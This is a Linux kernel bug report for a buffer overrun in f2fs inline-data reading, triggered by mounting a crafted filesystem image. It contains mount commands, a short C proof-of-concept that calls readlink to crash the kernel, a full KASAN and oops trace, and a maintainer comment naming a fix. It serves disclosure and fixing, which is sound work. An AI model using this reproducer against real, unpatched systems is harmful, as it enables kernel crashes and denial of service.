Bug 200219

Summary: Buffer overrun when reading inline data in f2fs
Product: File System Reporter: Wen Xu (wen.xu)
Component: f2fsAssignee: Default virtual assignee for f2fs (filesystem_f2fs)
Status: NEW ---    
Severity: normal CC: chao, wen.xu
Priority: P1    
Hardware: All   
OS: Linux   
Kernel Version: 4.18 Subsystem:
Regression: No Bisected commit-id:
Attachments: The (compressed) crafted image which causes crash

Description Wen Xu 2018-06-23 04:39:02 UTC 
Created attachment 276757 [details]
The (compressed) crafted image which causes crash

- Overview
Buffer overrun when reading inline data in f2fs 

- Reproduce
# mkdir mnt
# mount -t f2fs 59.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *sln;
  int err;

  err = asprintf(&sln, "%s/foo/bar/sln", mpoint);

  char buf2[1024];
  readlink(sln, buf2, sizeof(buf2));

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  548.329372] F2FS-fs (loop0): Can't find valid F2FS filesystem in 2th superblock
[  554.515450] ==================================================================
[  554.516977] BUG: KASAN: out-of-bounds in f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.518397] Read of size 18446744073709513216 at addr ffff8801f42ab50c by task poc/1310
[  554.520066]
[  554.520710]
[  554.521037] The buggy address belongs to the page:
[  554.522002] page:ffffea0007d0aac0 count:1 mapcount:0 mapping:0000000000000000 index:0x0
[  554.523594] flags: 0x2ffff0000000000()
[  554.524362] raw: 02ffff0000000000 dead000000000100 dead000000000200 0000000000000000
[  554.525888] raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000
[  554.527415] page dumped because: kasan: bad access detected
[  554.528535]
[  554.528852] Memory state around the buggy address:
[  554.529820]  ffff8801f42ab400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.531252]  ffff8801f42ab480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.532700] >ffff8801f42ab500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.534126]                       ^
[  554.534832]  ffff8801f42ab580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.536276]  ffff8801f42ab600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.537698] ==================================================================
[  554.539430] BUG: unable to handle kernel paging request at ffff8801eebe9000
[  554.540854] PGD 911ba067 P4D 911ba067 PUD 911c1067 PMD 1f3fb4063 PTE 80000001eebe9061
[  554.542431] Oops: 0003 [#1] SMP KASAN PTI
[  554.543253] CPU: 0 PID: 1310 Comm: poc Tainted: G    B             4.18.0-rc1+ #4
[  554.544746] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.546623] RIP: 0010:__memcpy+0x12/0x20
[  554.547409] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.571413] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.572474] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.573878] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.575283] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.576696] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.578099] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.579515] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.581152] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.582316] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.583750] Call Trace:
[  554.584264]  ? memcpy+0x45/0x50
[  554.584910]  f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.585853]  f2fs_read_inline_data+0x99/0x300
[  554.586745]  f2fs_read_data_page+0xed/0x110
[  554.587609]  do_read_cache_page+0x476/0x780
[  554.588463]  ? f2fs_read_data_pages+0x100/0x100
[  554.589381]  ? trailing_symlink+0x3b0/0x3b0
[  554.590232]  ? pagecache_get_page+0x2f0/0x2f0
[  554.591113]  ? putname+0x80/0x90
[  554.591787]  ? __kasan_slab_free+0x151/0x1a0
[  554.592654]  ? putname+0x80/0x90
[  554.593320]  ? kasan_slab_free+0xe/0x10
[  554.594105]  ? kmem_cache_free+0x89/0x1e0
[  554.594923]  ? putname+0x80/0x90
[  554.595596]  ? filename_lookup+0x191/0x280
[  554.596431]  ? f2fs_read_data_pages+0x100/0x100
[  554.597340]  read_cache_page+0x40/0x50
[  554.598100]  page_get_link+0x5d/0x1b0
[  554.598843]  f2fs_get_link+0x14/0x70
[  554.599578]  vfs_readlink+0x171/0x240
[  554.600322]  ? readlink_copy+0x50/0x50
[  554.601096]  do_readlinkat+0x1e3/0x210
[  554.601861]  ? __x32_compat_sys_newfstat+0x40/0x40
[  554.602833]  ? setxattr+0x260/0x260
[  554.603596]  ? removexattr+0xf0/0xf0
[  554.604329]  __x64_sys_readlink+0x48/0x60
[  554.605146]  do_syscall_64+0x78/0x170
[  554.605897]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  554.606913] RIP: 0033:0x7f4fe4946a37
[  554.607641] Code: 73 01 c3 48 8b 0d 61 b4 2c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 b8 59 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 31 b4 2c 00 f7 d8 64 89 01 48
[  554.611357] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.612863] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.614268] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.615700] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.617110] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.618514] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.619938] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.629596] CR2: ffff8801eebe9000
[  554.630278] ---[ end trace 4ce02f25ff7d3df5 ]---
[  554.631214] RIP: 0010:__memcpy+0x12/0x20
[  554.632026] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.635762] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.636808] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.638210] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.639626] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.641056] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.642464] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.643885] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.645474] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.646611] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.648461] BUG: unable to handle kernel paging request at 000004b2ffffffff
[  554.649875] PGD 0 P4D 0
[  554.650404] Oops: 0000 [#2] SMP KASAN PTI
[  554.651226] CPU: 0 PID: 1310 Comm: poc Tainted: G    B D           4.18.0-rc1+ #4
[  554.652768] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.654663] RIP: 0010:map_id_up+0x85/0x1f0
[  554.655489] Code: ff ff c7 00 f1 f1 f1 f1 c7 40 04 00 04 f4 f4 c7 40 08 f3 f3 f3 f3 65 48 8b 04 25 28 00 00 00 48 89 45 d0 31 c0 e8 1b 7a 1a 00 <8b> 03 89 85 74 ff ff ff 83 f8 05 0f 87 07 01 00 00 85 c0 0f 84 f8
[  554.667336] RSP: 0018:ffff8801e0ef7bd0 EFLAGS: 00010096
[  554.668390] RAX: 0000000000000000 RBX: 000004b2ffffffff RCX: ffffffffb81f5cb5
[  554.669789] RDX: 0000000000000000 RSI: 0000000000000004 RDI: 000004b2ffffffff
[  554.671191] RBP: ffff8801e0ef7c70 R08: ffffed003c1defb0 R09: ffff8801e0ef7d00
[  554.672602] R10: 0000000000000010 R11: ffffed003c1defaf R12: 0000000000000000
[  554.674016] R13: 0000000000000011 R14: ffff8801f2676040 R15: 1ffff1003c1def7d
[  554.675416] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.677012] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.678151] CR2: 000004b2ffffffff CR3: 000000009000e000 CR4: 00000000000006f0
[  554.679562] Call Trace:
[  554.680074]  ? make_kprojid+0x20/0x20
[  554.680819]  from_kuid_munged+0x28/0x50
[  554.681604]  do_notify_parent+0x1f5/0x4f0
[  554.682417]  ? send_sigqueue+0x390/0x390
[  554.683212]  ? css_set_move_task+0x152/0x340
[  554.684096]  ? will_become_orphaned_pgrp+0x11c/0x160
[  554.685092]  do_exit+0x1290/0x1390
[  554.685786]  ? mm_update_next_owner+0x380/0x380
[  554.686696]  ? setxattr+0x260/0x260
[  554.687406]  ? removexattr+0xf0/0xf0
[  554.688153]  ? __x64_sys_readlink+0x48/0x60
[  554.689007]  rewind_stack_do_exit+0x17/0x20
[  554.689849] RIP: 0033:0x7f4fe4946a37
[  554.690568] Code: Bad RIP value.
[  554.691241] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.692755] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.694190] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.695621] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.697040] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.698445] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.699872] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.709208] CR2: 000004b2ffffffff
[  554.709876] ---[ end trace 4ce02f25ff7d3df6 ]---
[  554.710809] RIP: 0010:__memcpy+0x12/0x20
[  554.711610] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.715325] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.716369] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.717775] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.719182] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.720597] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.722005] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.723407] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.725017] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.726151] CR2: 00007f4fe4946a0d CR3: 000000009000e000 CR4: 00000000000006f0
[  554.727572] Fixing recursive fault but reboot is needed!

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/f2fs/inline.c#L60
	memcpy(dst_addr, src_addr, MAX_INLINE_DATA(inode));
Based on KASAN report, there is buffer overrun in this memcpy()

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab, Gatech.
Comment 1 Chao Yu 2019-07-24 02:54:13 UTC 
Should have been fixed with below commit:

042be0f849e5 ("f2fs: fix to do sanity check with current segment number")

To Wen Xu, let me know if you have further question about this.